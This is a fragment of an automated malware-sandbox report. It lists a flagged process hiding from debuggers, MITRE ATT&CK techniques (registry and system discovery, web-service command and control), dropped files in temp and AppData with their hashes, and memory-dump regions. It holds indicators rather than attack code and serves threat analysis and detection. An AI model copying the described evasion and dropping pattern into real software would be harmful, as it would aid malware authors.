  - - C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
      "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:4556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Wrongdoing148.txt

Filesize
533B

MD5
c4fd6dd4674adeda7bb178482632e062

SHA1
f43851b9b5209eafa2896a4fa449af93f5c186e4

SHA256
c256b6b19c2b844f6b0354905a8f8a88c686a2addff795525ac0484ee92a8e88

SHA512
cd992def59025e60f77c14d781163d5267368d859152e785c7dc6c8d4a5af376acafa7d9d20a7d9d04e4343b99f143a8c9896d26862f4f45b93432536cb7d06d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wrongdoing148.txt

Filesize
1KB

MD5
f7a9ebc90890e94e98407afeb00e7d76

SHA1
aa77dd72824f5c3fdea28c3cce69b97c2b926873

SHA256
656fcb7591574360a6fd51d45395c37db58dcc61d37f7a2238835b387186ea06

SHA512
c0e6e4f5f362c8248512e284ad2749c9a48a3917f70533d153c648f7d95c3b516366a0c96c07150504f0a06dccb252eeb2cee8ab9aebeec097be5318ddd52738

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wrongdoing148.txt

Filesize
6KB

MD5
cfc4b455ecbba8a4712f29cc996f8a03

SHA1
36024c79e01d825496345bd194a5f2a8ba54329f

SHA256
5618b691194bf789dc641a8c3f423c5074eb8dcb29fde43ea16d7b448d37edf7

SHA512
51bc7a47084a3624c137b3a584c899eedd84f7a7e9b9b30bcc35d13b7305508e185f1bd9cef1cf3fd970d4128b773e0c2aea35120c68d186071c3d1382fd7d2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wrongdoing148.txt

Filesize
357B

MD5
fd615910a7c1eaa2aaa495cfafdd2bcc

SHA1
ae0a0559129b15a955975965ccfd32ab720a61c1

SHA256
05cd26383df55a1935a321643b2f1ea6f019f02739d4d3674bfe202318698598

SHA512
ddf73ae46f63a40a9a11712b8b9bdb3ca54f24ecbe9d89845e48361fedf318940b49b5b5f107cebf9fa61214dee38a53fd664d4f45fa665512f92ceb0ec392bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_prkgj5x2.2gd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Indoktrineredes.Mus

Filesize
498KB

MD5
fd2c79126794571bff2e747342a7a2c6

SHA1
6f2553e82f2833f74986db99150717a3a6a541c4

SHA256
77e4915258d44a56ace953e92a8cfac4e6fa73976f8726c6c0af337c734dc290

SHA512
9d16f00f51971eb65510ce19cb8195da44ac51040632b061750657bcc3e2872431a869ff1af5dfe79d44d3447d6719f093739251ca0bd66613a81f860efe80eb

Download Submit
memory/2468-332-0x0000024963D90000-0x0000024963DB2000-memory.dmp

Filesize
136KB

Download
memory/2468-331-0x00007FF83C2D3000-0x00007FF83C2D5000-memory.dmp

Filesize
8KB

Download
memory/2468-342-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp

Filesize
10.8MB

Download
memory/2468-343-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp

Filesize
10.8MB

Download
memory/2468-393-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp

Filesize
10.8MB

Download
memory/2468-384-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp

Filesize
10.8MB

Download
memory/2468-382-0x00007FF83C2D3000-0x00007FF83C2D5000-memory.dmp

Filesize
8KB

Download
memory/4412-360-0x0000000005BF0000-0x0000000005F44000-memory.dmp

Filesize
3.3MB

Download
memory/4412-366-0x0000000007410000-0x0000000007432000-memory.dmp

Filesize
136KB

Download
memory/4412-361-0x00000000061B0000-0x00000000061CE000-memory.dmp

Filesize
120KB

Download
memory/4412-362-0x00000000061F0000-0x000000000623C000-memory.dmp

Filesize
304KB

Download
memory/4412-363-0x0000000007B70000-0x00000000081EA000-memory.dmp

Filesize
6.5MB

Download
memory/4412-364-0x0000000006740000-0x000000000675A000-memory.dmp

Filesize
104KB

Download
memory/4412-365-0x00000000074F0000-0x0000000007586000-memory.dmp

Filesize
600KB

Download
memory/4412-350-0x0000000005B80000-0x0000000005BE6000-memory.dmp

Filesize
408KB

Download
memory/4412-367-0x00000000081F0000-0x0000000008794000-memory.dmp

Filesize
5.6MB

Download
memory/4412-349-0x00000000059E0000-0x0000000005A46000-memory.dmp

Filesize
408KB

Download
memory/4412-369-0x00000000087A0000-0x000000000AC54000-memory.dmp

Filesize
36.7MB

Download
memory/4412-348-0x0000000005940000-0x0000000005962000-memory.dmp

Filesize
136KB

Download
memory/4412-347-0x00000000052B0000-0x00000000058D8000-memory.dmp

Filesize
6.2MB

Download
memory/4412-346-0x00000000028D0000-0x0000000002906000-memory.dmp

Filesize
216KB

Download
memory/4556-385-0x0000000000400000-0x00000000005E4000-memory.dmp

Filesize
1.9MB

Download